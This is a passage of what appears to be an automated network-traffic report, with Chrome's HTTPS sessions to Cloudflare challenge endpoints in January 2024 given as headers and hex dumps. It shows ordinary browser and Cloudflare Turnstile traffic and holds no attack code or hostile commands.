                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iQpe7vFgq4a0RfM9sG3svu1%2F%2Fk%2FmnIyVrkB4BMKn0ohhYuWui%2BrxjUvCArdZTYd4fdwexIcO%2BAqBvZZe%2FrC8MRcb3K80qV%2BGYo9FYlbzkMJtWFtqYxWZATlN8kA37kg%2BlovvFRw1bEtbR0%2Fu3hI8GlU079s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c8b2d78678a-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:32 UTC682INData Raw: 34 38 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61
                                                                                                                                                                                    Data Ascii: 489<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica
                                                                                                                                                                                    2024-01-26 13:41:32 UTC486INData Raw: 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35
                                                                                                                                                                                    Data Ascii: ></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 25
                                                                                                                                                                                    2024-01-26 13:41:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    17192.168.2.1649740104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:32 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:32 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:32 GMT
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: max-age=2629800, public
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c8d8b7f1d7e-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:32 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                    Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                                                                                    2024-01-26 13:41:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    18192.168.2.1649741104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:32 UTC915OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 3055
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    CF-Challenge: bd4b5c1cf495e39
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:32 UTC3055OUTData Raw: 76 5f 38 34 62 39 32 63 38 34 31 66 39 39 62 31 32 37 3d 73 2d 75 68 36 68 67 68 56 68 4d 68 6d 68 71 6d 79 45 68 42 45 68 7a 39 30 78 30 52 51 55 30 6d 45 30 4b 51 74 62 30 49 61 30 51 77 6d 66 30 48 30 68 7a 6d 6e 39 67 6d 51 79 4e 68 51 68 51 39 51 5a 57 66 30 6e 69 30 31 6d 75 51 72 42 6b 68 59 56 79 30 4a 45 51 57 30 74 45 6d 51 42 30 51 61 77 69 73 30 71 77 59 30 7a 36 77 44 66 5a 56 73 35 30 30 42 6e 46 75 44 5a 30 4e 45 6e 4b 57 58 38 6d 51 6b 30 6d 24 77 4e 79 50 68 57 72 6e 69 6d 5a 45 59 30 51 75 75 4f 51 68 30 75 68 44 52 30 79 64 25 32 62 6c 30 51 46 67 24 77 30 2b 68 30 70 58 68 36 35 30 31 45 30 58 68 77 30 79 68 6e 46 6d 38 48 7a 2b 34 59 30 71 36 4d 75 76 30 51 79 4a 77 45 30 33 68 48 66 6b 4f 24 56 4c 74 6a 72 6e 59 74 2b 36 39 72 76 59
                                                                                                                                                                                    Data Ascii: v_84b92c841f99b127=s-uh6hghVhMhmhqmyEhBEhz90x0RQU0mE0KQtb0Ia0Qwmf0H0hzmn9gmQyNhQhQ9QZWf0ni01muQrBkhYVy0JEQW0tEmQB0Qawis0qwY0z6wDfZVs500BnFuDZ0NEnKWX8mQk0m$wNyPhWrnimZEY0QuuOQh0uhDR0yd%2bl0QFg$w0+h0pXh6501E0Xhw0yhnFm8Hz+4Y0q6Muv0QyJwE03hHfkO$VLtjrnYt+69rvY
                                                                                                                                                                                    2024-01-26 13:41:32 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:32 GMT
                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cf-chl-gen: vXGzgHTNby0ARDHlHZq5PE2qVtXAxlHYbyvcQ6rcbRw+LNPLwQCY9zaQe2luVImfVpnn7ekzzzMVV5h5z8QSVrzs2tTrsF3FxN7gt1kBMzIe6i+lCW06L7u1lOnO+E1KFqwL8RiN/C9ZCdOcTAbeSC6B7ikLYcOlRJNWHDOUxqAzsQsvov1HWtly/MGrhsDhE8B97Yq4+Sc1Z8cBAoTA3alm/fzsm66NS9oiQ0hQL/l2QywoQ60wC7+urhm1nGipb++27M9tMLB4fabZ1AH9lR6wI0hEN+ncNbQfFG519DiYd8EVvBUo2BC6cBIvOQaQ4QsSa/VNTihWqR/JCIGeJS2sKSDiHlC08e4yR1AnOLr2Al1w/5doa8eEorJyrdREh4O+zZQvvOfKvlUsx7cBThueskAjwek480wjrymL90M0KgG+4MZ169s8nqsbMBNZwBScWU5SjRXIOzyblbpmkicuyoD7AdY9ElxOwYNiR0Y=$/hSXppdnYYkwcRudZbELJw==
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c8d79ed7be1-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:32 UTC614INData Raw: 37 63 62 63 0d 0a 66 5a 61 64 69 49 32 4c 6b 6e 71 52 77 38 47 78 69 49 43 65 72 58 2f 44 7a 4d 2f 48 73 34 7a 43 79 35 4b 51 75 4d 69 55 6c 71 72 51 31 64 2b 2b 32 4c 4f 63 32 64 72 64 79 4a 2b 33 34 4b 47 69 74 63 6a 74 76 4c 37 4b 79 72 50 79 30 4f 7a 30 35 73 54 35 37 63 37 59 36 64 7a 54 32 39 76 37 31 50 62 6a 38 4c 38 48 2f 76 63 48 39 2b 62 71 44 67 76 52 37 42 4d 45 37 67 4c 78 32 65 7a 32 2b 65 6f 58 44 41 4d 42 2f 42 45 43 4b 42 6e 6b 46 69 73 6d 49 74 38 65 44 43 6b 41 49 4f 77 55 42 41 63 6f 43 69 63 4b 42 54 6f 76 44 67 6b 38 4c 54 73 55 50 44 34 30 50 51 51 55 49 30 6b 4d 48 53 59 50 48 42 78 54 45 7a 5a 4c 4a 55 31 49 4e 7a 45 35 4c 7a 34 57 55 6d 45 76 57 6c 59 32 4c 68 31 64 49 43 6c 59 56 53 63 75 4f 58 46 76 4d 48 46 51 59 6d 46 4f 65
                                                                                                                                                                                    Data Ascii: 7cbcfZadiI2LknqRw8GxiICerX/DzM/Hs4zCy5KQuMiUlqrQ1d++2LOc2drdyJ+34KGitcjtvL7KyrPy0Oz05sT57c7Y6dzT29v71Pbj8L8H/vcH9+bqDgvR7BME7gLx2ez2+eoXDAMB/BECKBnkFismIt8eDCkAIOwUBAcoCicKBTovDgk8LTsUPD40PQQUI0kMHSYPHBxTEzZLJU1INzE5Lz4WUmEvWlY2Lh1dIClYVScuOXFvMHFQYmFOe
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 67 45 46 61 57 48 75 44 67 56 6c 2f 6b 49 56 73 57 35 46 50 6c 45 31 4f 54 31 68 6c 61 6f 6c 65 6a 58 52 72 56 47 74 38 66 31 78 36 59 6f 61 42 6d 47 4f 74 6d 34 70 73 71 36 2b 43 5a 71 70 73 6f 4c 6c 72 6b 62 68 75 65 35 71 54 65 49 76 41 77 49 79 37 66 4b 65 6a 67 4c 32 31 6f 49 6d 76 72 4d 6e 4f 78 70 44 47 78 59 7a 56 79 35 47 32 77 35 71 75 73 38 65 79 6f 4e 71 77 74 4f 62 42 70 4c 4f 33 70 65 71 6b 31 72 66 70 7a 73 6a 75 71 62 43 2b 36 39 62 4d 31 75 54 6a 7a 2f 4f 32 32 74 58 74 41 77 4c 58 32 67 6a 6f 78 74 62 2b 30 39 76 70 41 75 45 41 42 4f 44 64 45 75 77 49 33 39 4c 50 31 78 51 56 2f 68 6f 50 46 76 49 69 2f 75 4c 35 41 68 58 78 2b 66 4d 59 42 79 41 66 41 51 73 77 4a 2f 34 30 42 68 67 44 4f 44 41 6f 4f 78 55 34 4b 77 6a 36 2b 42 67 51 52 42 59
                                                                                                                                                                                    Data Ascii: gEFaWHuDgVl/kIVsW5FPlE1OT1hlaolejXRrVGt8f1x6YoaBmGOtm4psq6+CZqpsoLlrkbhue5qTeIvAwIy7fKejgL21oImvrMnOxpDGxYzVy5G2w5qus8eyoNqwtObBpLO3peqk1rfpzsjuqbC+69bM1uTjz/O22tXtAwLX2gjoxtb+09vpAuEABODdEuwI39LP1xQV/hoPFvIi/uL5AhXx+fMYByAfAQswJ/40BhgDODAoOxU4Kwj6+BgQRBY
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 46 5a 62 58 5a 47 4a 62 45 79 4c 54 6b 39 78 55 33 47 50 6c 58 42 30 65 35 71 65 6b 59 74 79 6f 6e 52 6d 6c 47 4b 46 65 70 79 42 6d 33 79 61 68 6f 2b 78 72 71 43 48 63 4b 4f 6d 6c 33 61 6f 6d 4a 75 34 76 35 37 41 65 35 61 79 75 6e 36 43 70 35 4f 54 69 34 4f 45 79 4d 2b 48 71 61 4c 4f 72 71 47 33 72 4b 4f 75 73 64 69 50 33 65 43 37 77 4e 44 55 6d 39 79 7a 70 62 65 2b 35 37 66 4a 33 4d 2f 71 37 4d 44 63 79 36 2b 79 37 4c 62 41 35 72 48 79 32 2f 33 52 36 39 33 74 79 39 43 2f 33 73 38 46 76 38 6e 6a 35 38 58 34 41 2b 73 53 42 75 33 46 45 65 66 7a 30 4f 37 6e 36 51 77 62 45 2f 76 75 44 66 6a 69 33 2f 33 62 38 77 4d 4b 49 43 59 4a 44 76 6e 6d 42 77 2f 70 48 69 4d 51 4a 68 38 55 45 2f 63 52 47 44 55 5a 4d 67 6c 42 50 52 62 36 4e 53 41 61 4f 42 4d 2f 49 77 51 58
                                                                                                                                                                                    Data Ascii: FZbXZGJbEyLTk9xU3GPlXB0e5qekYtyonRmlGKFepyBm3yaho+xrqCHcKOml3aomJu4v57Ae5ayun6Cp5OTi4OEyM+HqaLOrqG3rKOusdiP3eC7wNDUm9yzpbe+57fJ3M/q7MDcy6+y7LbA5rHy2/3R693ty9C/3s8Fv8nj58X4A+sSBu3FEefz0O7n6QwbE/vuDfji3/3b8wMKICYJDvnmBw/pHiMQJh8UE/cRGDUZMglBPRb6NSAaOBM/IwQX
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 43 50 6b 56 53 56 53 32 4e 6e 64 46 4e 51 63 59 36 4b 56 47 39 6a 57 35 78 36 65 48 4b 59 70 49 52 6d 70 47 47 48 70 6e 46 6c 70 4a 2b 76 64 70 4b 58 64 34 65 35 71 48 71 52 6d 5a 57 62 6c 59 36 7a 6e 35 69 34 78 38 4f 58 75 6f 7a 42 6f 70 69 51 72 34 72 54 73 61 2b 6a 79 4e 65 78 70 38 7a 58 76 62 4b 6f 6f 4c 75 76 31 71 37 57 74 4d 61 32 33 4f 44 62 74 74 76 74 72 71 37 41 73 38 76 57 36 2f 50 34 31 75 7a 34 37 38 76 53 7a 65 72 68 74 50 32 37 2f 50 50 65 35 67 4c 61 35 66 66 70 34 65 59 48 32 65 30 55 43 42 50 65 37 78 54 73 38 68 62 4f 42 78 59 61 30 75 6e 35 44 2b 50 58 49 65 51 55 38 78 34 4d 49 4f 4d 73 45 43 67 64 49 43 41 30 37 66 4d 44 43 41 59 71 44 6a 7a 30 47 68 45 4a 47 69 49 53 52 42 6f 6f 47 45 6b 69 47 68 59 4b 51 43 30 65 53 41 30 46 46
                                                                                                                                                                                    Data Ascii: CPkVSVS2NndFNQcY6KVG9jW5x6eHKYpIRmpGGHpnFlpJ+vdpKXd4e5qHqRmZWblY6zn5i4x8OXuozBopiQr4rTsa+jyNexp8zXvbKooLuv1q7WtMa23ODbttvtrq7As8vW6/P41uz478vSzerhtP27/PPe5gLa5ffp4eYH2e0UCBPe7xTs8hbOBxYa0un5D+PXIeQU8x4MIOMsECgdICA07fMDCAYqDjz0GhEJGiISRBooGEkiGhYKQC0eSA0FF
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 79 57 56 74 35 6c 6f 74 73 6a 6e 43 42 70 6f 35 2f 5a 61 4b 70 6d 32 4b 48 6f 4b 5a 37 70 6d 39 75 71 6f 57 43 73 59 4e 76 6b 58 4b 36 64 36 6d 51 6d 49 47 71 71 37 71 65 73 35 6d 65 70 36 57 49 78 38 75 2f 72 72 2b 72 6f 37 53 6e 7a 37 4c 4e 31 61 7a 57 31 71 53 34 73 74 6e 50 30 4e 53 63 6d 2b 43 35 32 64 76 59 71 71 58 4b 36 61 7a 6d 77 38 4c 42 7a 2b 54 6b 79 39 61 30 36 74 76 37 74 4d 36 38 30 4d 79 37 37 39 61 37 34 67 4c 78 2f 64 6f 4c 39 51 4c 65 44 2f 6b 47 34 68 50 39 43 75 59 58 41 67 37 71 47 77 59 53 37 68 38 4b 46 76 49 6a 44 68 72 32 4a 78 49 63 48 79 77 64 39 53 77 5a 4c 68 49 48 42 51 49 74 2f 52 45 53 45 6a 59 56 46 68 33 30 4c 53 6b 72 50 55 4d 7a 45 45 4d 41 4a 78 30 57 52 54 59 4c 47 79 45 4a 54 45 67 65 4a 43 68 47 54 53 56 4f 4f 30
                                                                                                                                                                                    Data Ascii: yWVt5lotsjnCBpo5/ZaKpm2KHoKZ7pm9uqoWCsYNvkXK6d6mQmIGqq7qes5mep6WIx8u/rr+ro7Snz7LN1azW1qS4stnP0NScm+C52dvYqqXK6azmw8LBz+Tky9a06tv7tM680My779a74gLx/doL9QLeD/kG4hP9CuYXAg7qGwYS7h8KFvIjDhr2JxIcHywd9SwZLhIHBQIt/RESEjYVFh30LSkrPUMzEEMAJx0WRTYLGyEJTEgeJChGTSVOO0
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 6c 56 6c 63 63 58 53 52 6b 70 53 6f 71 47 6c 6b 66 6f 6c 71 63 49 71 75 6b 58 42 31 74 4a 52 78 6c 4a 71 77 6b 72 53 62 6e 59 43 53 6a 36 36 34 6d 4d 44 49 74 71 6e 4b 7a 62 62 43 6a 4d 79 2b 79 5a 43 70 78 4e 4f 71 30 4b 6e 4e 6d 62 50 4d 30 37 44 4b 31 39 54 4c 30 61 53 68 73 4a 37 49 73 74 6d 6d 31 2b 54 73 7a 64 6e 77 7a 4e 2f 55 31 4c 54 78 30 4c 6a 72 36 2f 50 66 30 64 54 57 2b 2b 34 41 42 65 51 43 31 4f 6a 6e 77 77 6b 4a 34 75 34 50 37 41 38 53 41 39 51 53 45 73 34 57 37 4f 6b 4d 45 42 55 65 32 52 33 62 33 66 45 4f 34 51 45 55 43 52 54 6f 4b 53 72 67 37 4f 37 76 4c 42 48 38 48 79 34 41 37 7a 49 50 4e 76 63 58 50 78 6f 2f 4d 6b 45 6a 41 43 59 63 4d 53 45 36 4b 7a 38 31 4f 6a 31 47 49 43 4e 42 44 54 46 4a 4b 79 31 4b 52 53 6b 56 4a 7a 4d 72 4e 46 34
                                                                                                                                                                                    Data Ascii: lVlccXSRkpSoqGlkfolqcIqukXB1tJRxlJqwkrSbnYCSj664mMDItqnKzbbCjMy+yZCpxNOq0KnNmbPM07DK19TL0aShsJ7Istmm1+TszdnwzN/U1LTx0Ljr6/Pf0dTW++4ABeQC1OjnwwkJ4u4P7A8SA9QSEs4W7OkMEBUe2R3b3fEO4QEUCRToKSrg7O7vLBH8Hy4A7zIPNvcXPxo/MkEjACYcMSE6Kz81Oj1GICNBDTFJKy1KRSkVJzMrNF4
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 35 75 57 6b 33 52 74 6e 49 71 6f 6e 71 79 69 66 59 74 7a 66 35 61 4f 63 34 32 31 6c 49 65 4c 69 72 31 36 73 33 79 38 6f 34 4f 41 71 4c 79 6e 75 4c 79 6a 70 61 33 53 69 4b 4c 54 6a 38 44 4c 79 4b 65 32 72 4c 75 37 75 73 6e 56 73 74 6a 6b 6e 4b 58 54 35 4d 4b 6e 31 71 66 42 32 73 61 6e 32 71 2f 66 72 50 57 2f 33 75 48 5a 30 4d 6e 36 75 2f 61 31 39 4e 6e 31 2f 4d 37 76 77 39 58 45 2f 65 50 41 43 2b 4d 43 37 39 34 48 30 41 76 6f 7a 41 6a 50 35 67 54 77 42 4f 77 58 39 53 41 65 45 67 34 5a 45 68 30 65 4a 77 51 63 2b 78 77 6b 4c 50 63 61 4b 66 33 35 2f 42 45 66 38 66 41 59 2b 42 4d 5a 43 78 6e 35 4c 54 4d 73 4f 44 63 76 49 68 45 57 51 77 41 7a 4b 51 59 67 43 43 38 4c 4a 30 64 4a 44 54 34 76 53 78 41 6a 55 46 55 70 4e 6c 67 35 48 57 4a 4d 57 43 4a 46 4f 30 68 54
                                                                                                                                                                                    Data Ascii: 5uWk3RtnIqonqyifYtzf5aOc421lIeLir16s3y8o4OAqLynuLyjpa3SiKLTj8DLyKe2rLu7usnVstjknKXT5MKn1qfB2san2q/frPW/3uHZ0Mn6u/a19Nn1/M7vw9XE/ePAC+MC794H0AvozAjP5gTwBOwX9SAeEg4ZEh0eJwQc+xwkLPcaKf35/BEf8fAY+BMZCxn5LTMsODcvIhEWQwAzKQYgCC8LJ0dJDT4vSxAjUFUpNlg5HWJMWCJFO0hT
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 6d 61 68 35 4f 49 71 34 43 54 6a 32 36 34 6a 5a 47 63 6c 33 53 58 67 4a 78 2b 75 62 4f 66 67 4d 53 62 76 34 6d 47 76 4c 79 76 75 37 33 44 71 61 61 51 72 71 6d 4e 78 4c 6a 4e 6c 38 69 38 30 5a 79 77 7a 73 2b 69 31 37 44 41 35 72 4c 54 35 4c 33 6b 37 75 37 72 77 4f 54 70 73 4f 32 30 35 50 62 42 39 4d 2f 6d 32 39 71 32 36 74 2f 65 76 62 75 36 41 2f 62 30 78 64 58 5a 79 64 54 64 79 4f 67 49 34 51 4c 4c 30 65 44 74 30 66 45 4a 42 41 55 64 36 4f 76 36 45 52 48 67 44 66 4c 6a 38 78 4d 66 47 43 62 71 4b 4f 67 71 4a 41 6a 78 4c 41 6b 4f 49 79 76 31 4c 66 48 31 48 42 4d 55 47 52 6f 36 49 54 51 35 47 30 4d 6f 47 52 59 4b 50 45 63 57 51 68 6b 37 4b 44 45 66 49 44 39 4a 4a 53 63 58 52 53 38 6e 55 54 6f 39 4d 6a 55 62 50 56 46 54 48 79 4a 48 4b 47 51 71 62 46 35 45 4a
                                                                                                                                                                                    Data Ascii: mah5OIq4CTj264jZGcl3SXgJx+ubOfgMSbv4mGvLyvu73DqaaQrqmNxLjNl8i80Zywzs+i17DA5rLT5L3k7u7rwOTpsO205PbB9M/m29q26t/evbu6A/b0xdXZydTdyOgI4QLL0eDt0fEJBAUd6Ov6ERHgDfLj8xMfGCbqKOgqJAjxLAkOIyv1LfH1HBMUGRo6ITQ5G0MoGRYKPEcWQhk7KDEfID9JJScXRS8nUTo9MjUbPVFTHyJHKGQqbF5EJ
                                                                                                                                                                                    2024-01-26 13:41:32 UTC1369INData Raw: 4f 6f 62 4f 73 68 62 4b 55 66 49 61 59 75 5a 36 56 74 37 4b 5a 6c 72 75 67 73 35 32 46 6f 62 62 4d 69 49 71 70 79 74 47 66 74 4b 79 58 71 5a 53 37 30 74 32 2b 75 4c 36 30 72 36 48 6a 30 36 2f 6a 31 4f 58 41 33 38 79 34 36 75 76 47 34 62 72 78 77 64 37 53 79 72 48 4e 30 4f 75 33 39 2f 72 71 76 64 62 71 34 37 2f 5a 37 2f 48 79 77 4f 6a 59 36 64 37 68 39 77 44 4c 2b 65 44 39 43 77 6e 55 41 66 66 7a 36 65 34 4f 36 41 76 6e 38 68 33 31 48 68 6e 32 46 41 63 47 41 77 51 4c 43 67 63 62 44 65 77 64 48 54 51 30 2f 76 50 32 43 41 59 71 44 69 77 30 46 68 41 77 4c 42 77 50 52 52 34 6f 46 30 51 37 4e 78 51 64 42 41 39 47 4b 6b 49 6a 52 44 56 4a 55 6b 64 4f 53 56 74 46 47 46 78 65 47 6d 45 62 50 52 6f 76 4a 44 5a 46 49 57 46 56 54 55 74 64 57 56 46 4f 62 57 4e 49 58 30
                                                                                                                                                                                    Data Ascii: OobOshbKUfIaYuZ6Vt7KZlrugs52FobbMiIqpytGftKyXqZS70t2+uL60r6Hj06/j1OXA38y46uvG4brxwd7SyrHN0Ou39/rqvdbq47/Z7/HywOjY6d7h9wDL+eD9CwnUAffz6e4O6Avn8h31Hhn2FAcGAwQLCgcbDewdHTQ0/vP2CAYqDiw0FhAwLBwPRR4oF0Q7NxQdBA9GKkIjRDVJUkdOSVtFGFxeGmEbPRovJDZFIWFVTUtdWVFObWNIX0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    19192.168.2.1649745104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:34 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:34 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:34 GMT
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                    cf-chl-out: nsk0dN/DiTnaKFstRDXK/w==$JfzWZH1tplnGCjG+u5qAFg==
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c9c2f3b53c7-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:34 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                                                    Data Ascii: 7invalid
                                                                                                                                                                                    2024-01-26 13:41:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    20192.168.2.1649746104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:34 UTC775OUTGET /cdn-cgi/challenge-platform/h/g/i/84b92c841f99b127/1706276492524/rUSBpge9MP4B7lT HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
